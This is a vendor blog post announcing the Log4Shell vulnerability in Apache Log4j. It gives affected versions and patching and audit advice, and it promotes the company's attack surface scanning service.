Last week, the United States Cybersecurity and Infrastructure Security Agency issued an alert about a new vulnerability in Apache Log4j that you should be aware of.
What you need to know
- Log4Shell is a new vulnerability being actively exploited in the wild that should be mitigated ASAP.
- The TrustedSite platform does not rely on Log4j and is not, and has not, been vulnerable.
- New vulnerability definitions in TrustedSite’s Server and Application Scanning services will identify potentially vulnerable assets.
- Manual inspection is required in addition to TrustedSite services.
The Log4Shell vulnerability lies in Apache Log4j versions from 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4. The bug can be easily exploited to enable Remote Code Execution. Some hackers have already developed tools that automatically attempt to exploit the bug. As reported by WIRED, Log4j is widely used in enterprise systems and web apps and it is expected that many mainstream services will be affected. Apache rates the vulnerability at “critical” severity and has published patches and mitigations.
How to protect your organization
Conduct an immediate audit of your code to find dependencies that rely on Log4j. Patch vulnerable versions of Log4j where possible and quarantine any applications that you can’t patch.
It’s never been more important to know your true attack surface
With this announcement of the latest critical vulnerability, it’s important to remember that you can’t protect what you don’t know about. If your organization has lost sight of digital assets over the years, it’s possible you could be susceptible to the Log4Shell vulnerability and not realize it. Practicing attack surface management can help ensure you’ve cataloged every asset you have exposed to the internet. With a complete inventory of your attack surface, you can be more confident that no vulnerabilities are hiding in the shadows.
TrustedSite offers a complete attack surface management solution that can help you stay protected from vulnerabilities like Log4Shell. Get started with a free trial.